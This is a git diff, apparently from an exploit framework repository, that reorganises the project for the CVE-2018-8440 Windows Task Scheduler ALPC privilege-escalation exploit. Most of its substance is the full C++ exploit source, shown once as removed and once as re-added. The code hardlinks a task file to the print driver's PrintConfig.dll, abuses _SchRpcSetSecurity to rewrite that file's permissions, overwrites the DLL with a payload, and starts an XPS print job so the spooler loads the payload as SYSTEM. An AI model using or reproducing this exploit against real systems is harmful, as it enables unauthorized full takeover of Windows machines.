diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll index 16771aa310..0b02f5745a 100755 Binary files a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll differ diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.exp b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.exp new file mode 100755 index 0000000000..b8c976f5a9 Binary files /dev/null and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.exp differ diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.lib b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.lib new file mode 100755 index 0000000000..79f5a7e96d Binary files /dev/null and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.lib differ diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.pdb b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.pdb new file mode 100755 index 0000000000..15a6bfec44 Binary files /dev/null and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.pdb differ diff --git a/data/exploits/CVE-2018-8440/ALPC_TaskSched.exp b/data/exploits/CVE-2018-8440/ALPC_TaskSched.exp deleted file mode 100755 index 5220c439d8..0000000000 Binary files a/data/exploits/CVE-2018-8440/ALPC_TaskSched.exp and /dev/null differ diff --git a/data/exploits/CVE-2018-8440/ALPC_TaskSched.lib b/data/exploits/CVE-2018-8440/ALPC_TaskSched.lib deleted file mode 100755 index e6eb25df74..0000000000 Binary files a/data/exploits/CVE-2018-8440/ALPC_TaskSched.lib and /dev/null differ diff --git a/data/exploits/CVE-2018-8440/ALPC_TaskSched.pdb b/data/exploits/CVE-2018-8440/ALPC_TaskSched.pdb deleted file mode 100755 index 9569bb65e6..0000000000 Binary files a/data/exploits/CVE-2018-8440/ALPC_TaskSched.pdb and /dev/null differ diff --git a/data/exploits/CVE-2018-8440/reflective_dll.x64.dll b/data/exploits/CVE-2018-8440/reflective_dll.x64.dll deleted file mode 100755 index 442582fc7b..0000000000 Binary files a/data/exploits/CVE-2018-8440/reflective_dll.x64.dll and /dev/null differ diff --git a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll b/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll deleted file mode 100755 index 5d4d5077f0..0000000000 Binary files a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll and /dev/null differ diff --git a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.vcxproj b/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.vcxproj deleted file mode 100755 index 3abc946b21..0000000000 --- a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.vcxproj +++ /dev/null @@ -1,178 +0,0 @@ - - - - - Debug - Win32 - - - Release - Win32 - - - Debug - x64 - - - Release - x64 - - - - 15.0 - {E75DCF6C-9B6D-49C8-96D7-0003C127B449} - Win32Proj - Poc_StorSvc - 10.0.16299.0 - ALPC-TaskSched-LPE - - - - Application - true - v141 - Unicode - - - Application - false - v141 - true - Unicode - - - Application - true - v120 - Unicode - - - DynamicLibrary - false - v120 - true - Unicode - - - - - - - - - - - - - - - - - - - - - true - - - true - - - false - - - false - - - - Use - Level3 - Disabled - WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - - - Console - true - - - - - NotUsing - Level3 - Disabled - _DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - MultiThreaded - - - Console - true - - - - - Use - Level3 - MaxSpeed - true - true - WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - - - Console - true - true - true - - - - - NotUsing - Level3 - MaxSpeed - true - true - NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) - false - MultiThreaded - - - Console - true - true - true - xpsprint.lib;%(AdditionalDependencies) - - - - - - - - - - - - - - - MultiThreadedDLL - NotUsing - NotUsing - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ClassDiagram.cd b/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ClassDiagram.cd deleted file mode 100755 index 7b894197b9..0000000000 --- a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ClassDiagram.cd +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/Resource.aps b/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/Resource.aps deleted file mode 100755 index 0825bba8a2..0000000000 Binary files a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/Resource.aps and /dev/null differ diff --git a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/Resource.rc b/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/Resource.rc deleted file mode 100755 index b0447ddedd..0000000000 Binary files a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/Resource.rc and /dev/null differ diff --git a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/dllmain.cpp b/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/dllmain.cpp deleted file mode 100755 index 1931aad18e..0000000000 --- a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/dllmain.cpp +++ /dev/null @@ -1,37 +0,0 @@ -#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN - -//===============================================================================================// -// This is a stub for the actuall functionality of the DLL. -//===============================================================================================// -#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" - -// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are -// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own -// DllMain and use the LoadRemoteLibraryR() API to inject this DLL. - -// You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c) -extern HINSTANCE hAppInstance; -//===============================================================================================// -#include "stdafx.h" -#include "Header.h" -BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) -{ - BOOL bReturnValue = TRUE; - switch (dwReason) - { - case DLL_QUERY_HMODULE: - if (lpReserved != NULL) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - MessageBox(0, L"In DLLMain", L"Status", MB_OK); - CreateThread(NULL, 0, ExploitThread, hinstDLL, 0, NULL); - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} diff --git a/external/source/exploits/CVE-2018-8440/common/ReflectiveDLLInjection.h b/external/source/exploits/CVE-2018-8440/common/ReflectiveDLLInjection.h deleted file mode 100755 index 4ae206b549..0000000000 --- a/external/source/exploits/CVE-2018-8440/common/ReflectiveDLLInjection.h +++ /dev/null @@ -1,53 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H -#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include - -// we declare some common stuff in here... - -#define DLL_METASPLOIT_ATTACH 4 -#define DLL_METASPLOIT_DETACH 5 -#define DLL_QUERY_HMODULE 6 - -#define DEREF( name )*(UINT_PTR *)(name) -#define DEREF_64( name )*(DWORD64 *)(name) -#define DEREF_32( name )*(DWORD *)(name) -#define DEREF_16( name )*(WORD *)(name) -#define DEREF_8( name )*(BYTE *)(name) - -typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID ); -typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); - -#define DLLEXPORT __declspec( dllexport ) - -//===============================================================================================// -#endif -//===============================================================================================// \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE.sln b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE.sln new file mode 100755 index 0000000000..e2045c638c --- /dev/null +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE.sln @@ -0,0 +1,41 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2013 +VisualStudioVersion = 12.0.40629.0 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ALPC-TaskSched-LPE", "ALPC-TaskSched-LPE\ALPC-TaskSched-LPE.vcxproj", "{E75DCF6C-9B6D-49C8-96D7-0003C127B449}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|ARM = Debug|ARM + Debug|Win32 = Debug|Win32 + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|ARM = Release|ARM + Release|Win32 = Release|Win32 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|ARM.ActiveCfg = Debug|Win32 + {E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|Win32.ActiveCfg = Debug|Win32 + {E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|Win32.Build.0 = Debug|Win32 + {E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x64.ActiveCfg = Debug|x64 + {E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x64.Build.0 = Debug|x64 + {E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x86.ActiveCfg = Debug|Win32 + {E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x86.Build.0 = Debug|Win32 + {E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|ARM.ActiveCfg = Release|Win32 + {E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|Win32.ActiveCfg = Release|Win32 + {E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|Win32.Build.0 = Release|Win32 + {E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x64.ActiveCfg = Release|x64 + {E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x64.Build.0 = Release|x64 + {E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x86.ActiveCfg = Release|Win32 + {E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {AA32DEA9-85D3-447D-820E-C6ACA3AD0CBD} + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/CVE-2018-8440/dll/src/Exploit.cpp b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp similarity index 71% rename from external/source/exploits/CVE-2018-8440/dll/src/Exploit.cpp rename to external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp index c12ce0b30c..9b674be685 100755 --- a/external/source/exploits/CVE-2018-8440/dll/src/Exploit.cpp +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp @@ -1,208 +1,163 @@ -//***************************************************************// -// Windows LPE - Non-admin/Guest to system - by SandboxEscaper // -//***************************************************************// - -/* _SchRpcSetSecurity which is part of the task scheduler ALPC endpoint allows us to set an arbitrary DACL. -It will Set the security of a file in c:\windows\tasks without impersonating, a non-admin (works from Guest too) user can write here. -Before the task scheduler writes the DACL we can create a hard link to any file we have read access over. -This will result in an arbitrary DACL write. -This PoC will overwrite a printer related dll and use it as a hijacking vector. This is ofcourse one of many options to abuse this.*/ - -#define UNICODE -#include "stdafx.h" -#include "exploit.h" -#include "resource.h" -#include "rpc_h.h" -#include -#include -#pragma comment(lib, "rpcrt4.lib") -#pragma comment(lib, "XpsPrint.lib") -using namespace std; - -RPC_STATUS CreateBindingHandle(RPC_BINDING_HANDLE *binding_handle) -{ - RPC_STATUS status; - RPC_BINDING_HANDLE v5; - RPC_SECURITY_QOS SecurityQOS = {}; - RPC_WSTR StringBinding = nullptr; - RPC_BINDING_HANDLE Binding; - - StringBinding = 0; - Binding = 0; - status = RpcStringBindingComposeW(L"c8ba73d2-3d55-429c-8e9a-c44f006f69fc", L"ncalrpc", - nullptr, nullptr, nullptr, &StringBinding); - if (status == RPC_S_OK) - { - status = RpcBindingFromStringBindingW(StringBinding, &Binding); - RpcStringFreeW(&StringBinding); - if (!status) - { - SecurityQOS.Version = 1; - SecurityQOS.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE; - SecurityQOS.Capabilities = RPC_C_QOS_CAPABILITIES_DEFAULT; - SecurityQOS.IdentityTracking = RPC_C_QOS_IDENTITY_STATIC; - - status = RpcBindingSetAuthInfoExW(Binding, 0, 6u, 0xAu, 0, 0, (RPC_SECURITY_QOS*)&SecurityQOS); - if (!status) - { - v5 = Binding; - Binding = 0; - *binding_handle = v5; - } - } - } - - if (Binding) - RpcBindingFree(&Binding); - return status; -} - -extern "C" void __RPC_FAR * __RPC_USER midl_user_allocate(size_t len) -{ - return(malloc(len)); -} - -extern "C" void __RPC_USER midl_user_free(void __RPC_FAR * ptr) -{ - free(ptr); -} - -bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname); - -void RunExploit() -{ - RPC_BINDING_HANDLE handle; - RPC_STATUS status = CreateBindingHandle(&handle); - - //These two functions will set the DACL on an arbitrary file (see hardlink in main), change the security descriptor string parameters if needed. - _SchRpcCreateFolder(handle, L"UpdateTask", L"D:(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;0x1301bf;;;AU)(A;OICIIO;SDGXGWGR;;;AU)(A;;0x1200a9;;;BU)(A;OICIIO;GXGR;;;BU)", 0); - _SchRpcSetSecurity(handle, L"UpdateTask", L"D:(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;0x1301bf;;;AU)(A;OICIIO;SDGXGWGR;;;AU)(A;;0x1200a9;;;BU)(A;OICIIO;GXGR;;;BU)", 0); -} - -int mainf() -{ - //We enumerate the path of PrintConfig.dll, which we will write the DACL of and overwrite to hijack the print spooler service - //You might want to expand this code block with FindNextFile .. as there may be multiple prnms003.inf_amd64* folders since older versions do not get cleaned up it in some rare cases. - //When this happens this code has no garantuee that it will target the dll that ends up getting loaded... and you really want to avoid this. - WIN32_FIND_DATA FindFileData; - HANDLE hFind; - - hFind = FindFirstFile(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnms003.inf_amd64*", &FindFileData); - wchar_t BeginPath[MAX_PATH] = L"c:\\windows\\system32\\DriverStore\\FileRepository\\"; - wchar_t PrinterDriverFolder[MAX_PATH]; - wchar_t EndPath[23] = L"\\Amd64\\PrintConfig.dll"; - wmemcpy(PrinterDriverFolder, FindFileData.cFileName, wcslen(FindFileData.cFileName)); - FindClose(hFind); - wcscat_s(BeginPath, PrinterDriverFolder); - wcscat_s(BeginPath, EndPath); - - //Create a hardlink with UpdateTask.job to our target, this is the file the task scheduler will write the DACL of - CreateNativeHardlink(L"c:\\windows\\tasks\\UpdateTask.job", BeginPath); - RunExploit(); - - //Must be name of final DLL.. might be better ways to grab the handle - HMODULE mod = GetModuleHandle(L"ALPC-TaskSched-LPE"); - - //Payload is included as a resource, you need to modify this resource accordingly. - //HRSRC myResource = ::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA); - HANDLE hPayload = ::CreateFile(L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); - if (hPayload == INVALID_HANDLE_VALUE) { - MessageBox(NULL, L"FATAL ERROR : Couldn't open the payload dll file.", L"ALPC-TaskSched-LPE", MB_OK); - return(-1); - } - else { - MessageBox(NULL, L"Successfully opened the payload dll file.", L"ALPC-TaskSched-LPE", MB_OK); - } - //unsigned int myResourceSize = ::SizeofResource(mod, myResource); - //HGLOBAL myResourceData = ::LoadResource(mod, myResource); - //void* pMyBinaryData = ::LockResource(myResourceData); - - DWORD payloadSize = ::GetFileSize(hPayload, NULL); - WCHAR msg[32]; - wsprintf(msg, L"Payload size: %d", payloadSize); - MessageBox(NULL, msg, L"ALPC-TaskSched-LPE", MB_OK); - - VOID* payloadBuffer = malloc(payloadSize); - if (payloadBuffer == NULL) { - MessageBox(NULL, L"FATAL ERROR : Unable to malloc() payload buffer.", L"ALPC-TaskSched-LPE", MB_OK); - return(-1); - } - else { - MessageBox(NULL, L"Successfully malloced the payload buffer.", L"ALPC-TaskSched-LPE", MB_OK); - } - - DWORD bytesRead; - ::ReadFile(hPayload, payloadBuffer, payloadSize, &bytesRead, NULL); - if (payloadSize != bytesRead) { - wsprintf(msg, L"ERROR: %d", GetLastError()); - MessageBox(NULL, L"FATAL ERROR : Bytes read from file differs from payload size.", L"ALPC-TaskSched-LPE", MB_OK); - MessageBox(NULL, msg, L"ALPC-TaskSched-LPE", MB_OK); - return(-1); - } - else { - MessageBox(NULL, L"Successfully read the payload buffer.", L"ALPC-TaskSched-LPE", MB_OK); - } - - //We try to open the DLL in a loop, it could already be loaded somewhere.. if thats the case, it will throw a sharing violation and we should not continue - HANDLE hFile; - DWORD dwBytesWritten = 0; - do { - hFile = CreateFile(BeginPath,GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); - WriteFile(hFile,(char*)payloadBuffer,bytesRead,&dwBytesWritten,NULL); - if (hFile == INVALID_HANDLE_VALUE) - { - Sleep(5000); - } - } while (hFile == INVALID_HANDLE_VALUE); - CloseHandle(hFile); - CloseHandle(hPayload); - - MessageBox(NULL, L"0", L"ALPC-TaskSched-LPE", MB_OK); - - //After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service. - CoInitialize(nullptr); - IXpsOMObjectFactory *xpsFactory = NULL; - CoCreateInstance(__uuidof(XpsOMObjectFactory), NULL, CLSCTX_INPROC_SERVER, __uuidof(IXpsOMObjectFactory), reinterpret_cast(&xpsFactory)); - HANDLE completionEvent = CreateEvent(NULL, TRUE, FALSE, NULL); - IXpsPrintJob *job = NULL; - IXpsPrintJobStream *jobStream = NULL; - MessageBox(NULL, L"6", L"ALPC-TaskSched-LPE", MB_OK); - StartXpsPrintJob(L"Microsoft XPS Document Writer", L"Print Job 1", NULL, NULL, completionEvent, NULL, 0, &job, &jobStream, NULL); - - if (job == NULL) { - MessageBox(NULL, L"job is NULL.", L"ALPC-TaskSched-LPE", MB_OK); - } - else { - MessageBox(NULL, L"job is not NULL.", L"ALPC-TaskSched-LPE", MB_OK); - } - - if (jobStream == NULL) { - MessageBox(NULL, L"jobStream is NULL.", L"ALPC-TaskSched-LPE", MB_OK); - } - else { - MessageBox(NULL, L"jobStream is not NULL.", L"ALPC-TaskSched-LPE", MB_OK); - } - - MessageBox(NULL, L"7", L"ALPC-TaskSched-LPE", MB_OK); - // jobStream->Close(); - MessageBox(NULL, L"8", L"ALPC-TaskSched-LPE", MB_OK); - CoUninitialize(); - MessageBox(NULL, L"9", L"ALPC-TaskSched-LPE", MB_OK); - return 0; -} -DWORD CALLBACK ExploitThread(LPVOID hModule) -{ - mainf(); - FreeLibraryAndExitThread((HMODULE)hModule, 0); - return 0; -} -extern "C" void testFunc(){ - MessageBox(NULL, L"Testing Function Called", L"ALPC-TaskSched-LPE", MB_OK); - //mainf(); -} -extern "C" void RunIt(void* hModule) -{ - CreateThread(NULL, 0, ExploitThread, hModule, 0, NULL); -} - - +//***************************************************************// +// Windows LPE - Non-admin/Guest to system - by SandboxEscaper // +//***************************************************************// + +/* _SchRpcSetSecurity which is part of the task scheduler ALPC endpoint allows us to set an arbitrary DACL. +It will Set the security of a file in c:\windows\tasks without impersonating, a non-admin (works from Guest too) user can write here. +Before the task scheduler writes the DACL we can create a hard link to any file we have read access over. +This will result in an arbitrary DACL write. +This PoC will overwrite a printer related dll and use it as a hijacking vector. This is ofcourse one of many options to abuse this.*/ + +#include "stdafx.h" +#include "rpc_h.h" +#include +#include +#pragma comment(lib, "rpcrt4.lib") +using namespace std; + +//extern "C" __declspec (dllexport) DWORD CALLBACK ExploitThread(LPVOID); + +RPC_STATUS CreateBindingHandle(RPC_BINDING_HANDLE *binding_handle) +{ + RPC_STATUS status; + RPC_BINDING_HANDLE v5; + RPC_SECURITY_QOS SecurityQOS = {}; + RPC_WSTR StringBinding = nullptr; + RPC_BINDING_HANDLE Binding; + + StringBinding = 0; + Binding = 0; + status = RpcStringBindingComposeW(L"c8ba73d2-3d55-429c-8e9a-c44f006f69fc", L"ncalrpc", + nullptr, nullptr, nullptr, &StringBinding); + if (status == RPC_S_OK) + { + status = RpcBindingFromStringBindingW(StringBinding, &Binding); + RpcStringFreeW(&StringBinding); + if (!status) + { + SecurityQOS.Version = 1; + SecurityQOS.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE; + SecurityQOS.Capabilities = RPC_C_QOS_CAPABILITIES_DEFAULT; + SecurityQOS.IdentityTracking = RPC_C_QOS_IDENTITY_STATIC; + + status = RpcBindingSetAuthInfoExW(Binding, 0, 6u, 0xAu, 0, 0, (RPC_SECURITY_QOS*)&SecurityQOS); + if (!status) + { + v5 = Binding; + Binding = 0; + *binding_handle = v5; + } + } + } + + if (Binding) + RpcBindingFree(&Binding); + return status; +} + +extern "C" void __RPC_FAR * __RPC_USER midl_user_allocate(size_t len) +{ + return(malloc(len)); +} + +extern "C" void __RPC_USER midl_user_free(void __RPC_FAR * ptr) +{ + free(ptr); +} + +bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname); + +void RunExploit() +{ + RPC_BINDING_HANDLE handle; + RPC_STATUS status = CreateBindingHandle(&handle); + + //These two functions will set the DACL on an arbitrary file (see hardlink in main), change the security descriptor string parameters if needed. + _SchRpcCreateFolder(handle, L"UpdateTask", L"D:(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;0x1301bf;;;AU)(A;OICIIO;SDGXGWGR;;;AU)(A;;0x1200a9;;;BU)(A;OICIIO;GXGR;;;BU)", 0); + _SchRpcSetSecurity(handle, L"UpdateTask", L"D:(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;0x1301bf;;;AU)(A;OICIIO;SDGXGWGR;;;AU)(A;;0x1200a9;;;BU)(A;OICIIO;GXGR;;;BU)", 0); +} + +int mainf() +{ + //We enumerate the path of PrintConfig.dll, which we will write the DACL of and overwrite to hijack the print spooler service + //You might want to expand this code block with FindNextFile .. as there may be multiple prnms003.inf_amd64* folders since older versions do not get cleaned up it in some rare cases. + //When this happens this code has no garantuee that it will target the dll that ends up getting loaded... and you really want to avoid this. + WIN32_FIND_DATA FindFileData; + HANDLE hFind; + + hFind = FindFirstFile(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnms003.inf_amd64*", &FindFileData); + wchar_t BeginPath[MAX_PATH] = L"c:\\windows\\system32\\DriverStore\\FileRepository\\"; + wchar_t PrinterDriverFolder[MAX_PATH]; + wchar_t EndPath[23] = L"\\Amd64\\PrintConfig.dll"; + wmemcpy(PrinterDriverFolder, FindFileData.cFileName, wcslen(FindFileData.cFileName)); + FindClose(hFind); + wcscat(BeginPath, PrinterDriverFolder); + wcscat(BeginPath, EndPath); + + //Create a hardlink with UpdateTask.job to our target, this is the file the task scheduler will write the DACL of + CreateNativeHardlink(L"c:\\windows\\tasks\\UpdateTask.job", BeginPath); + RunExploit(); + + //Must be name of final DLL.. might be better ways to grab the handle + //HMODULE mod = GetModuleHandle(L"ALPC-TaskSched-LPE"); + + //Payload is included as a resource, you need to modify this resource accordingly. + //HRSRC myResource = ::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA); + HANDLE hPayload = ::CreateFile(L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + if (hPayload == INVALID_HANDLE_VALUE) { + return(-1); + } + + //unsigned int myResourceSize = ::SizeofResource(mod, myResource); + //HGLOBAL myResourceData = ::LoadResource(mod, myResource); + //void* pMyBinaryData = ::LockResource(myResourceData); + + DWORD payloadSize = ::GetFileSize(hPayload, NULL); + WCHAR msg[32]; + + VOID* payloadBuffer = malloc(payloadSize); + if (payloadBuffer == NULL) { + return(-1); + } + + DWORD bytesRead; + ::ReadFile(hPayload, payloadBuffer, payloadSize, &bytesRead, NULL); + if (payloadSize != bytesRead) { + return(-1); + } + + //We try to open the DLL in a loop, it could already be loaded somewhere.. if thats the case, it will throw a sharing violation and we should not continue + HANDLE hFile; + DWORD dwBytesWritten = 0; + do { + hFile = CreateFile(BeginPath, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + WriteFile(hFile, (char*)payloadBuffer, bytesRead, &dwBytesWritten, NULL); + if (hFile == INVALID_HANDLE_VALUE) + { + Sleep(5000); + } + } while (hFile == INVALID_HANDLE_VALUE); + CloseHandle(hFile); + CloseHandle(hPayload); + + //After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service. + CoInitialize(nullptr); + IXpsOMObjectFactory *xpsFactory = NULL; + CoCreateInstance(__uuidof(XpsOMObjectFactory), NULL, CLSCTX_INPROC_SERVER, __uuidof(IXpsOMObjectFactory), reinterpret_cast(&xpsFactory)); + HANDLE completionEvent = CreateEvent(NULL, TRUE, FALSE, NULL); + IXpsPrintJob *job = NULL; + IXpsPrintJobStream *jobStream = NULL; + + StartXpsPrintJob(L"Microsoft XPS Document Writer", L"Print Job 1", NULL, NULL, completionEvent, NULL, 0, &job, &jobStream, NULL); + + // jobStream->Close(); + CoUninitialize(); + return 0; +} + +DWORD CALLBACK ExploitThread(LPVOID hModule) +{ + mainf(); + FreeLibraryAndExitThread((HMODULE)hModule, 0); + return 0; +} \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.filters b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.filters similarity index 96% rename from external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.filters rename to external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.filters index 551f56b1a5..671ba85fd6 100755 --- a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.filters +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.filters @@ -1,55 +1,55 @@ - - - - - {4FC737F1-C7A5-4376-A066-2A32D752A2FF} - cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx - - - {93995380-89BD-4b04-88EB-625FBE52EBFB} - h;hh;hpp;hxx;hm;inl;inc;xsd - - - - - Source Files - - - Header Files - - - Header Files - - - Header Files - - - - - Source Files - - - Source Files - - - Source Files - - - Source Files - - - Source Files - - - - - Source Files - - - - - - - - + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + 